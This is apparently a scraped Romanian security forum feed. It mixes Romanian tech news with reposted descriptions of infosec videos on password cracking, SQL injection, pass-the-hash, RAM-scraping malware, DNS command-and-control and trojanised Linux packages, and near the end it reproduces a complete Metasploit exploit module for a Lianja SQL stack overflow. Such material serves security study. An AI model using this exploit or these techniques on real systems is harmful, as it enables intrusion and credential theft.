Kwelwild

Description: In this video you will learn how to crack a FTP service for password. Ncrack is a very powerful network service and protocol cracking tool. Using this tool you can crack lots of services like RDP,POP,FTP,SMB,SSH etc. This tool is powered by Nmap.org and very popular because of advanced usages and powerful for cracking process. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ftp Cracking With Ncrack

E clar. E http, nu https.

Decizia anuntata de gigant este una radicala Gigantul IT spune ca toate conturile inactive vor fi sterse, pentru a le oferi oamenilor posibilitatea de a-si alege un alt ID. Inactive sunt considerate cele care nu au mai fost folosite in ultimele 12 luni "Daca ganditi ca mine, inseamna ca vreti un ID de Yahoo care sa fie scurt, interesant si usor de retinut, precum albert@yahoo.com in loc de albert9330399@yahoo.com", a declarat Jay Rossiter, vicepresedintele tuturor platformelor Yahoo. Astfel, internautii care nu si-au mai accesat contul de o buna perioada mai au timp sa o faca doar pana pe 15 iulie. Daca nu o fac pana la aceasta data, atunci conturile lor vor fi sterse, iar ceilalti utilizatori vor putea face cerere pentru a obtine ID-urile lor. Compania nu a precizat cate conturi sunt in aceasta situatie, insa se pare ca ar fi vorba de foarte multe. Sursa: Anuntul facut de Yahoo. Ce se va intampla cu unele conturi - www.yoda.ro

Idem expl0iter.

Reteaua sociala condusa de Mark Zuckerberg calca pe urmele Twitter si Instagram Hashtagurile sunt, acum, parte din viata utilizatorilor de Facebook care pot, astfel, sa tina mai bine pasul cu ceea ce se intampla. Zvonul privind implementarea hashtagurilor a aparut prin martie, iar ieri primii utilizatori ai retelei s-au bucurat de ele. In perioada urmatoare, acestea vor fi disponibile pentru tot mai multi useri. Aceste cuvinte cu semnul diez in fata sunt menite sa ii ajute pe utilizatori sa gaseasca mai usor continut in reteaua sociala. Potrivit Facebook, multi dintre utilizatori foloseau deja singuri acest sistem, inainte ca el sa fie oficial. Hashtagurile vor putea fi cautate si veti putea, de asemenea, da click pe ele pentru a obtine postari pe acelasi subiect, scrie Mashable. Hashtagurile au aparut in 2007, gratie unui utilizator de Twitter pe nume Chris Messina. Cei de la Twitter au adoptat, ulterior, sistemul propus de el pentru organizarea informatiei. Astazi, gasim hashtaguri chiar si in Flickr, Tumblr, Google+ si Instagram. Sursa: Facebook are acum hashtaguri VIDEO - www.yoda.ro

Alerta in Arabia Saudita! O cunoscuta aplicatie de mesagerie a fost interzisa de autoritati Aplicatia prin care se poate comunica gratuit atat prin mesaje scrise, cat si prin voce a fost scoasa in afara legii de o comisie pentru comunicare si tehnologia informatiei. Creatorii aplicatiei Viber au primit un avertisment in luna martie a acestui an, alaturi de cei care au realizat Skype si WhatsApp, dar Communications and Information Technology Commission a interzis-o doar pe prima. Utilizatorii Viber sunt mai mult mai putini decat cei ai celorlalte aplicatii, scoaterea din legalitate putand fi luat ca un avertisment pentru ce va urma. Printre speculatiile care circula pe tema interzicerii se afla interese autoritariste dar si sprijin pentru serviciile de telefonie mobila din tara araba. Comunicarea prin Viber este greu de monitorizat, aplicatia cunoscand o crestere a popularitatii in 2011, cu ocazia protestelor din Primavara Araba. Pe de alta parte, Regatul Saudit are tot interesul sa sprijine STC (Saudi Telecom Company), serviciu de telefonie mobila detinut de stat. STC este cea mai mare companie de profil din regiune, judecand dupa castiguri, numar de angajati si cota de piata. Sursa: Alerta in Arabia Saudita! O cunoscuta aplicatie de mesagerie a fost interzisa de autoritati - www.yoda.ro

Description: In this video you will learn how to exploit a web application using Burp Suite tool with Blind SQL Injection vulnerability. We are using Burp Suite for Blind SQLI because using Burp Suite we can our valuable time. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Using Burp To Exploit A Blind Sql Injection

Description: In this video you will learn how to exploit MS-SQL. This video is advanced for exploiting MS-SQL Database. For Exploiting a MS-SQL Database Hoody is using a tool called SQLNINJA . SQLNINJA is a very powerful SQLI exploitation tool. About SQLNINJA : The full documentation can be found in the tarball and also here, but here's a list of what the Ninja does: Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode) Data extraction, time-based or via a DNS tunnel Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection or just to upload Meterpreter Upload of executables using only normal HTTP requests (no FTP/TFTP needed), via vbscript or debug.exe Direct and reverse bindshell, both TCP and UDP DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental) Privilege escalation to sysadmin group if 'sa' password has been found Creation of a custom xp_cmdshell if the original one has been removed TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell Evasion techniques to confuse a few IDS/IPS/WAF Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: How To Use Sqlninja To Takeover Ms-Sql Database Servers

Description: In this video you will learn how to use KEIMPX. KEIMPX is a Python script and which is built around the IMpacket library to perform pass the hash audits across single target. keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for valid credentials across a network over SMB. Credentials can be: Combination of user / plain-text password. Combination of user / NTLM hash. Combination of user / NTLM logon session token. If any valid credentials has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he will be prompted with an interactive SMB shell where the user can: Spawn an interactive command prompt. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections. List users details, domains and password policy. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Keimpx: Smb Shell To Meterpreter Shell

Description: In this video you will learn how to find CSRF vulnerability and how you can exploit that vulnerability using Burp Suite tool. Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Finding Cross Site Request Forgery Vulnerabilities With Burp

Description: In this video ViruSxNolr Explain the use burp suite tool to scan web applications and discover gaps Command Execution without having to look at the compiled code of the application and exploit this vulnerability to penetrate the server by lifting Meterpreter format php. A Burp suit tool programmed in Java and designed to examine Tbiqat of fully web of a large number of gaps, the tool works in the form of proxy, so that the tool is turned on and then browse the application naturally through the browser, and then the tool will record deficiencies identified In the video tool used to discover a loophole Command Execution, and then you use draft Almitasploat composition meterpreter payload format PHP, Badhaasthaddam may Burp suite again to raise and run Albailoud and thus penetrate the server. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Burp Suite Exploitation Exploit Command Execution

Cea mai inteligenta metodata de prindere a copiatorilor! )

http://www.youtube.com/watch?v=2TVMZ7vqvI0&feature=player_embedded Description: This video explains how you can eliminate the bad characters in the shellcode which can break your exploit. Kerala Cyber Force Ajin Abraham Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Eliminating the bad characters in your Exploit - YouTube Sursa: Eliminating The Bad Characters In Your Exploit

Description: In this video you will learn how to setup IDS softwares like Snort, Snorby, Barnyard, PulledPork, Daemonlogger. How to make your network more secure using these tools and monitoring on your server is easy using this tools. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Basic Setup Of Security-Onion Snort, Snorby, Barnyard, Pulledpork, Daemonlogger

Description: The following video demonstrates on working of Ram scraping Malware. This custom malware can scrape the unencrypted credentials from volatile memory from all modern browsers. Author: Jamieson O'Reilly - Australia | LinkedIn For more details please regarding Ram scraping malware please refer following link http://www.scmagazine.com.au/News/345109,memory-gaffe-leaves-aussie-bank-accounts-open-to-theft.aspx Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ram Scraping Malware

Description: Cobalt Strike's Beacon is a payload for red team operations. This video demonstrates its new ability to stage itself over DNS and to use DNS as a data channel to execute commands, download files, and receive logged keystrokes. Beaconing - Cobalt Strike Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Command And Control Over Dns With Beacon

Refuz sa cred (asta dupa ce am vazut prezentarea), arata-ne buletinul. On: Welcome.

http://www.youtube.com/watch?feature=player_embedded&v=_Je2-CbECsc Description: Port your exploits to metasploit modules with ease using mona.py By Ajin Abraham Kerala Cyber Force http://www.keralacyberforce.in Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Convert your Exploits to Metasploit Modules in a matter of minutes with mona.py - YouTube Sursa: Convert Your Exploits To Metasploit Modules In A Matter Of Minutes With Mona.Py

http://www.youtube.com/watch?feature=player_embedded&v=b3_q0gRSDsc Description: Client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://www.youtube.com/watch?v=b3_q0gRSDsc Sursa: Binary Linux Trojan

Bine ai venit!

Lovitura grea primita de Yahoo. Pierde 6 milioane de utilizatori intr-o zi de teama sa nu le fie sparte conturile O companie telecom din Marea Britanie a anuntat ca nu va mai lasa ca Yahoo Mail sa fie serviciul default de email, scrie Huffington Post. Anuntul vine dupa ce Yahoo a devenit tinta uno zvonuri prin care conturile sale sunt extrem de vulnerabile atacurilor informatice, astfel compania telecom britanica British Telecom a anuntat ca va muta emailul default catre BT Mail. Desi baza de utilizatori Yahoo Mail este uriasa, de 280 de milioane conturi in toata lumea, acest anunt ar putea fi inceputul unui val mult mai mare de decizii similare, motiv pentru care Yahoo considera situatia ca fiind una ingrijoratoare. Sursa: Lovitura grea primita de Yahoo. Pierde 6 milioane de utilizatori intr-o zi de teama sa nu le fie sparte conturile - www.yoda.ro

Description: In this video you will learn how to use Hexorbase tool for dumping the Database and fiding out the name of the database HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets. https://code.google.com/p/hexorbase/ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hexorbase - Database Bruteforcer And Exploitation Tool

[VB.Net]Port Scanner - RaGEZONE forums Cam mare asemanarea nu?! Sunt curios..oare unul dintre voi a reusit vreodata sa scrie un program/linie de cod de la 0?! (Intreb asta deoarece va dati mari programatori cu programelele voastre 'open-source' de pe google ) .

Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::RopDb def initialize(info = {}) super(update_info(info, 'Name' => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the db_netserver process which is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2. }, 'Author' => 'Spencer McIntyre', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3563' ] ], 'DefaultOptions' => { 'WfsDelay' => 20 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'StackAdjustment' => -3500, 'Space' => 500, 'BadChars' => "\x01" }, 'Targets' => [ [ 'Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2', { 'rop_target' => '2003' } ], [ 'Lianja SQL 1.0.0RC5.1 / Windows XP SP3', { 'rop_target' => 'xp' } ], ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'May 22 2013')) register_options( [ Opt::RPORT(8001), ], self.class) end def check begin connect rescue return Exploit::CheckCode::Safe end sock.put("db_net") if sock.recv(4) =~ /\d{1,5}/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect sock.put("db_net") sock.recv(4) print_status("#{rhost}:#{rport} - Sending Malicious Data") evil_data = '000052E1' evil_data << 'A' evil_data << ('0' * 19991) # this can't be randomized, else a Read Access Violation will occur evil_data << generate_rop_payload('msvcrt', payload.encoded, {'target' => target['rop_target']}) sock.put(evil_data) disconnect end end Sursa: Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow

Description: A recording of the January DFIROnline meetup with Michael Cohen of Google Michael is one of the authors of Volatility and has presented a great lab on its' use at quite a few conferences. If you are not familiar with volatility or memory forensics this is not one to miss. The volatility team are also offering training in Windows Memory Forensics, for details see their blog. Memory forensics and analysis have become very powerful tools for the incident responder. In this workshop we will cover some of the basic ideas behind memory analysis in a practical way focusing on the Volatility Memory Forensics framework - and in particular on the upcoming technology preview branch. The following broad topics will be covered: 1) Memory Acquisition Volatility contains a full imaging solution for Windows, Linux and OSX systems. In addition to obtaining a fixed memory image, there is support for the analysis of live systems. We describe how to image and analyze live Windows systems and in particular we demonstrate how the running system appears to the forensic examiner with examples of normal and suspicious looking processes. 2) Anti-Forensics We then examine the fundamentals of memory analysis. In particular we look at anti forensic techniques and how they target Volatility (and other) memory analysis tools. 3) The Volatility Framework We look at some of the plugins for windows memory analysis and how the different techniques can be used to cross check analysis results and potentially uncover hidden malware. DFIROnline is a monthly online meeting of digital forensic and incident response professionals. The purpose of these meetups is to enable information sharing among the DFIR community. These session are open to anyone, and occur on the third Thursday of every month at 2000 US eastern time. If you would like to get involved and present something please email meetup at writeblocked.org. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Memory Forensics With Michael Cohen